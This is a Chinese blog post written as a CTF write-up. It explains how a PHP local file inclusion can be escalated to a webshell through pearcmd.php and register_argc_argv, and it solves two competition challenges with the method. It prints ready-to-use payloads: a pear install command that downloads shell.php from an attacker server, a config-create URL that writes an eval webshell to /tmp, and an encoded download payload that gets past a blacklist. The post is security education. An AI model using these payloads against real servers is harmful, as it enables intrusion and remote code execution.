CTF中的pearcmd.php文件包含

最新推荐文章于 2024-04-23 02:34:03 发布
最新推荐文章于 2024-04-23 02:34:03 发布
阅读量993 收藏 7
点赞数
分类专栏: ctf 文章标签: php 安全 网络安全 命令模式 linux
原文链接:https://juejin.cn/post/7147638903191814180
版权

首发掘金:https://juejin.cn/post/7147638903191814180

引文

其实这个去年就做虎符杯的题目时了解过,也是一个比较有趣的点,今年发现好多比赛都出过类似或者大差不差考这个知识点的题目,于是简单总结一下。

前置知识

PEAR

pear全称PHP Extension and Application Repository,php扩展和应用仓库,在docker中默认安装,路径为/user/local/lib/php.

register_argc_argv

php.ini里面的一个选项,默认为OFF,我们需要将其设置为ON。

1、cli模式(命令行)下

可以通过$_SERVER[‘argv’]`获得命令行参数

2、web网页模式下

传参时用+连接的值的个数就是argc,各个参数被存到argv里,

可以举个例子测试一下:

<?php
$xino=$_GET['xino'];
var_dump($_SERVER['argc']);
var_dump($_SERVER['argv']);
?>

在这里插入图片描述

可以看到其中是用+号来进行分隔的。

PEARCMD.PHP

先看看pear的存放地点为/usr/bin/pear,我们看一下它的源码

# first find which PHP binary to use
if test "x$PHP_PEAR_PHP_BIN" != "x"; then
  PHP="$PHP_PEAR_PHP_BIN"
else
  if test "/usr/bin/php" = '@'php_bin'@'; then
    PHP=php
  else
    PHP="/usr/bin/php"
  fi
fi

# then look for the right pear include dir
if test "x$PHP_PEAR_INSTALL_DIR" != "x"; then
  INCDIR=$PHP_PEAR_INSTALL_DIR
  INCARG="-d include_path=$PHP_PEAR_INSTALL_DIR"
else
  if test "/usr/share/pear" = '@'php_dir'@'; then
    INCDIR=`dirname $0`
    INCARG=""
  else
    INCDIR="/usr/share/pear"
    INCARG="-d include_path=/usr/share/pear"
  fi
fi

exec $PHP -C -q $INCARG -d date.timezone=UTC -d output_buffering=1 -d variables_order=EGPCS -d open_basedir="" -d safe_mode=0 -d register_argc_argv="On" -d auto_prepend_file="" -d auto_append_file="" $INCDIR/pearcmd.php "$@"

是一个sh程序,并在最后一行调用了pearcmd.php ,跟进一下pearcmd.php会发现

public static function readPHPArgv()
{
    global $argv;
    if (!is_array($argv)) {
        if (!@is_array($_SERVER['argv'])) {
            if (!@is_array($GLOBALS['HTTP_SERVER_VARS']['argv'])) {
                $msg = "Could not read cmd args (register_argc_argv=Off?)";
                return PEAR::raiseError("Console_Getopt: " . $msg);
            }
            return $GLOBALS['HTTP_SERVER_VARS']['argv'];
        }
        return $_SERVER['argv'];
    }
    return $argv;
}

判断 a r g v 是否为空,再尝试 ‘ argv是否为空,再尝试` argv是否为空,再尝试_SERVER[‘argv’]`,后者我们上文已经了解了是可以控制的,也就是说,我们通过Web访问了pear命令行的功能,且能够控制命令行的参数。,具体利用思路也就清晰了,我们可以通过包含pearcmd.php然后拼接执行一些操作。

利用

就简单举几个比较常用的例子

出网

没了解过pear的可能不清楚,pear工具简单来说就是用来下载东西了,这不就有思路了,能不能直接往服务器里下载一个马。

命令如下:其中shell就是我们vps里写个恶意木马。

pear install -R /tmp http://xxxxxxx/shell.php

不出网

pear工具里有一个命令叫:config-create,这个命令需要传入两个参数,其中第二个参数是写入的文件路径,第一个参数会被写入到这个文件中。

我们可以构造url:

index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/xino.php

然后包含我们新建的这个文件就OK了。

例题

HXBCTF2021(EASYWILL)

willphp框架代码审计:

<?php
namespace home\controller;
class IndexController{
    public function index(){
        highlight_file(__FILE__);
        assign($_GET['name'],$_GET['value']);
        return view();
    }
}

进去只有这些,需要我们自行下载源码,然后修改源码的这一部分放本地去做就行。
我们按照题目跟进assign

public static function assign($name, $value = null) {
		if ($name != '') self::$vars[$name] = $value;
	}

返回View.php

public static function fetch($file = '', $vars = []) {
		if (!empty($vars)) self::$vars = array_merge(self::$vars, $vars);	//数组合并
		$viewfile = self::getViewFile($file);
		if (file_exists($viewfile)) {
			array_walk_recursive(self::$vars, 'self::parseVars'); //处理输出
			define('__RUNTIME__', round((microtime(true) - START_TIME) , 4));	
			Template::render($viewfile, self::$vars);
		} else {
			App::halt($file.' 模板文件不存在。');
		}
	}

跟进render
Template.php

public static function renderTo($viewfile, $vars = []) {
		$m = strtolower(__MODULE__);
		$cfile = 'view-'.$m.'_'.basename($viewfile).'.php';
		if (basename($viewfile) == 'jump.html') {
			$cfile = 'view-jump.html.php';
		}
		$cfile = PATH_VIEWC.'/'.$cfile;
		if (APP_DEBUG || !file_exists($cfile) || filemtime($cfile) < filemtime($viewfile)) {
			$strs = self::compile(file_get_contents($viewfile), $vars);
			file_put_contents($cfile, $strs);
		}
		extract($vars);
		include $cfile;
	}

此处存在变量覆盖,可进行文件包含,name=cfile & value=xxx(我们想要包含的文件) 即可形成文件包含漏洞。

/?name=cfile&value=/usr/local/lib/php/pearcmd.php&+config-create+/<?=eval($_POST[a]);?>+/tmp/shell.php

执行马就可以了。

2022年羊城杯(rce_me)

因为这个比赛没打,看其他团队说这题也能用pearcmd.php去做,于是我们复现一下

题目给了我们源码

<?php
(empty($_GET["file"])) ? highlight_file(__FILE__) : $file=$_GET["file"];
function fliter($var): bool{
     $blacklist = ["<","?","$","[","]",";","eval",">","@","_","create","install","pear"];
         foreach($blacklist as $blackword){
           if(stristr($var, $blackword)) return False;
    }
    return True;
}  
if(fliter($_SERVER["QUERY_STRING"]))
{
include $file;
}
else
{
die("Noooo0");
}

直接读取flag,会发现权限不够,既然题目会包含文件,那么我们不妨尝试一下

?file=/usr/local/lib/php/%70%65arcmd.php&+download+vps/shell.php

上传马之后我们可以进终端用date -f /flag去查询flag。

结语

还是太菜了,当初看羊城杯的这个题目时完全没有想到可以用这个方法来做,还是做题太少了啊。

XINO丶
关注
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[HXBCTF 2021]easywill writeup(WillPHP源码审计+利用pearcmd.php文件包含getshell)
ShenZ的博客
04-18 669
[HXBCTF 2021]easywill [HXBCTF 2021]easywill 1.WillPHP源码审计 2.利用pearcmd.php文件包含getshell assign函数 看willphp\wiphp\View.php 最终到renderTo方法时$_vars数组的值是我们index.php传入的$_vars[name]=value 我们只需要让name为cfile,extact变量覆盖掉下面include的$cfile,即可进行任意文件包含
CTF之二维码扫描.7z
12-02
5. **加密与解密**:在CTF场景,二维码可能包含加密信息,扫描工具可能需要集成解密功能,比如对称加密、非对称加密或哈希函数。 6. **编程语言与框架**:这样的工具可能使用Python、Java或C++等编程语言开发,并...
pearcmd.php文件包含妙用
leekos的博客,分享web安全相关知识~
07-24 1364
PHP用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。在7.4及以后,需要我们在编译PHP的时候指定。这样我们就可以从远程服务器上下载shell到靶机上了,使用文件包含注意将路径url编码。不过,在Docker任意版本镜像,pcel/pear都会被默认安装,安装的路径在。必须传入两个参数,第一个参数传入绝对路径,第二个参数传入想要保存的文件名。运行,如果存在文件包含漏洞,就可以运行这个命令行工具。此处我们传入的第一个参数不是一个绝对路径,所以不行。这样,在文件包含下,我们就可以运行。
浅谈文件包含之包含pearcmd.php漏洞
JCPS_Y的博客
10-26 3516
浅谈一下文件包含之包含pearcmd.php漏洞
利用pearcmd.php文件包含拿shell(LFI)
m0_62422842的博客
09-08 2520
最近看博客的时候遇到有师傅总结了一个新颖的文件包含思路,通过pearcmd.php来进行本地文件包含来拿shell,我感觉还挺有意思的,就花时间来学习了一下。
利用pearcmd.php本地文件包含(LFI)
Mrs_H的博客
01-08 5827
利用pearcmd.php本地文件包含(LFI) 一.前言 pearcmd这个东西很久以前就已经复现过了,但是当时没有记录下来。这些天在整理之前比赛的wp的时候突然看见了pear的LFI到getshell,就突然想起来自己应该是利用过了的。但是怎么找也找不到之前的笔记,于是就有了再复现一遍的想法。 二.正文 1.环境的准备 这里的话我使用的是docker来搭建的一个lamp,然后在这个lamp上面进行后续的漏洞复现。至于为什么这么做呢?照P神的话来说就是因为在Docker任意版本的镜像pear都会被默认安
CTF常见密码总结.docx
04-10
ctf解题总结的一些实用的密码(编码方式),非常适合刚入坑的新手参考学习。比如常见的栅栏密码,摩斯电码,还有一些不常见的比如培根密码等等等等,非常全面!!!
CTFtools-SNOW.zip
11-03
Windows下SNOW隐写工具 snow.exe -C -m "被隐藏的信息“ -p "文件名
CTF6靶机实战.zip
05-25
本压缩包“CTF6靶机实战.zip”显然是一份用于CTF比赛的学习资料,包含了实战过程、反弹shell文件以及针对特定系统版本漏洞的利用脚本。 首先,我们要理解靶机的概念。在网络安全领域,靶机是模拟真实网络环境的...
CTF爆破CRC32.zip
02-05
网络安全领域,CTF(Capture The Flag)是一种流行的竞赛形式,它涉及到各种技术挑战,包括密码学、逆向工程、网络嗅探等。本话题聚焦于CRC32爆破,这是CTF赛事常见的一个技术环节。CRC32,全称Cyclic ...
pearcmd文件包含漏洞
Elite的博客
01-20 1514
pecl是PHP用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库
php 利用pearcmd实现裸文件包含
weixin_45805993的博客
12-03 1900
主要内容参考P神博客https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html 0x00phpinfo与条件竞争 之前做题好像遇到过,再复习一下 我们对任意一个PHP文件发送一个上传的数据包时,不管这个PHP服务后端是否有处理$_FILES的逻辑,PHP都会将用户上传的数据先保存到一个临时文件,这个文件一般位于系统临时目录,文件名是php开头,后面跟6个随机字符;在整个PHP文件执行完毕后,这些上传的临时文件就会被清理掉
Pearcmd.php
The_Epiphany的博客
03-25 374
pecl是PHP用于管理扩展而使用的命令行工具,而pear是pecl依赖的类库。2.我们要知道pearcmd.php的路径,因为实质上我们是想要先去包含pearcmd.php文件,进而实现pear命令调用,然后写入恶意文件。最终我们将恶意代码插入到了/tmp/shell.php,最后包含/tmp/shell.php文件即可。`==这段代码,其会将query-string的值赋给argv,实际上是将?*(一个开源的应用容器引擎)任意版本镜像,pcel/pear都会被默认安装,默认路径==`
pearcmd.php文件包含,相关CTF例题
m0_63716101的博客
11-27 1139
pear的默认安装路径为/usr/local/lib/php/pear.php,在命令可以使用pear和/usr/local/lib/php/pear.php运行,如果存在文件包含漏洞,则可以直接运行此命令,下面我们介绍一下register_argc_argv选项,如果此选项打开,则此时用户输入的内容。file后面是pearcmd的默认路径,因为Index.php提示了后面会加php,所以直接/usr/local/lib/php/pearcmd就好了。但他最后会在file后面加个.php,题目提示了。
初始认识pearcmd.php
m0_62706061的博客
11-17 589
初始pearcmd.php
利用 pearcmd.php 实现 Getshell
1tachi的博客
01-12 621
文章目录源码分析利用Pearcmd.php 学习连接:西湖论剑的一道Web 源码 <?php highlight_file(__FILE__); if(isset($_GET['check'])){ if(file_get_contents($_GET['check']) === "LFI"){ @include($_GET['a']); }else{ die("no!"); } } 分析 信息搜集了一圈,啥也没有,也就是说不知
利用pearcmd.php文件包含getshell
最新发布
m0_59053674的博客
04-23 1320
文章介绍如何利用pearcmd来getshel,并对payload的构造格式提出了一点想法
pearcmd.php的妙用
Sk1y的博客
12-20 3340
pearcmd.php的妙用 文章目录pearcmd.php的妙用1. register_argc_argvcli模式下WEB模式简单的利用2. pearcmd.php的神奇使用3. register_argc_argv和pear的关系4. payload靶机可出网靶机不可出网时参考链接 1. register_argc_argv 如果环境含有php.ini,则默认register_argc_argv=Off;如果环境没有php.ini,则默认register_argc_argv=On 这个regis
ctfshow MengXIn 下(pearcmd.php妙用&条件竞争&简单密码&简单misc)
weixin_63231007的博客
07-22 1814
通过可变信息通过GET方法是类似于参数传递给可执行文件。许多语言处理等方面argc和argv参数。argc是参数计数,并,argv是索引数组,包含的参数。如果您想声明变量$argc和$argv和模仿这种功能,使register_argc_argv。...
ctf比赛,常见的文件包含漏洞的做法
08-24
### 回答1: CTF 比赛常见的文件包含漏洞的做法包括: 1. 在文件嵌入恶意代码,例如 PHP 文件嵌入 PHP 后门。 2. 在文件嵌入解压后执行恶意代码的压缩包,例如在一个图片文件嵌入 zip 压缩包。 3. 在文件包含指向恶意网站的链接。 4. 在文件包含指向恶意文件的路径,例如在一个文本文件包含指向加密垃圾文件的路径。 最常见的文件包含漏洞的类型是 PHP 和其他服务器端脚本语言,因为它们可以在服务器上执行恶意代码。但也有可能在其他类型的文件发现文件包含漏洞,例如 PDF、Office 文档等。 ### 回答2: 在CTF比赛文件包含漏洞是一种常见的攻击方式。文件包含漏洞主要出现在动态网页,它指的是在文件引用其他文件时,未经有效的过滤或验证,导致恶意用户可以通过构造特定的请求,获取系统的敏感信息或执行任意代码。 首先,一个常见的做法是利用路径遍历来获取敏感文件。攻击者通过构造包含../的文件路径,让服务器读取到位于网站根目录之外的敏感文件。例如,攻击者可能会访问config.php,其包含数据库的用户名和密码。 其次,攻击者也可能利用文件包含漏洞实现远程文件包含,进一步扩大攻击面。如在引入文件的地方,通过传递网络路径的方式,将远程服务器上的恶意文件包含到受影响的网站上,从而执行任意代码。这种方式被称为远程文件包含(RFI)攻击。 除此之外,攻击者还可以通过利用用户的输入来实现文件包含漏洞。在某些情况下,网站可能会动态地引入用户提交的内容,例如通过GET或POST参数。攻击者可以构造恶意的参数值,使得网站将用户输入的内容当作文件路径进行解析,从而执行恶意代码或访问敏感文件。 为了防止文件包含漏洞,开发者需要进行严格的输入验证和过滤。例如,可以使用白名单机制,只允许系统访问指定目录内的文件。此外,对于用户输入的参数,要进行充分的校验和过滤,确保其只包含允许的字符和路径。 总之,在CTF比赛,常见的文件包含漏洞攻击方式主要包括路径遍历、远程文件包含和用户输入导致的漏洞。为了保护系统安全,开发者需要进行合适的输入验证、输出过滤和权限控制。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值